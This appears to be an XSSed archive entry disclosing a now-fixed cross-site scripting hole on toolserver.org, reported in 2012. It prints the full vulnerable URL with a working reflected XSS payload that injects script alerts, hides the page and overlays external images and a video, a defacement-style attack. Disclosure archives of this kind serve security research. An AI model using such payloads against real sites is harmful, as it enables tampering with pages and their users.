Fixed XSS vulnerability at toolserver.org

2012-02-19T00:00:00
ID XSSED:76560
Type xssed
Reporter Sony
Modified 2015-10-03T00:00:00

Description

Security researcher Sony submitted a cross-site scripting (XSS) vulnerability affecting toolserver.org on 19/02/2012; at the time of submission the site ranked 338697 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/03/2015. It is currently fixed.

Vulnerable URL: http://toolserver.org/~vvv/yaec.php?user=test&wiki=abwiki_p%22%3E%3C/title%3E%3Cscript%3Ealert%28%22inSecurity.Ro%20Romania%20Present..%22%29%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting..%22%29%3C/script%3E%3Cscript%3Ealert%28%22on%20Wikimedia%20Toolserver%20by%20Sony%22%29%3C/script%3E%3Cscript%3Ealert%28%22Because%20we%20care,%20we%27re%20securtiy%20aware..%22%29%3C/script%3E%3Cscript%3Ealert%28%22p.s.%20Because%20we%20are%20from%20inSecurity.Ro%22%29%3C/script%3E%3Cstyle%3Ebody{visibility:hidden;}%20html{background-image:url%28%27http://www.lenagold.ru/fon/geom/shar/raz/razshar119.jpg%27%29;}%3C/style%3E%27%22%3E%3Cdiv%20style=%22position:%20absolute;center:%20420px;top:%2040px;%E2%80%8B%E2%80%8Bz-index:%2010;visibility:%20visible;%20color:%20White;%20font-size:%2040px;%22%3E%3Cimg%20src=%22http://img257.imageshack.us/img257/3733/77822687.png%22%20style=%22height:%20400px;%20width:%20550px;%22%20alt=%22By%20Sony%22%3E%3Ciframe%20width=%22560%22%20height=%22315%22%20src=%22http://www.youtube.com/embed/3P06kyFpIQU%22%20frameborder=%220%22%20allowfullscreen%3E%3C/iframe%3E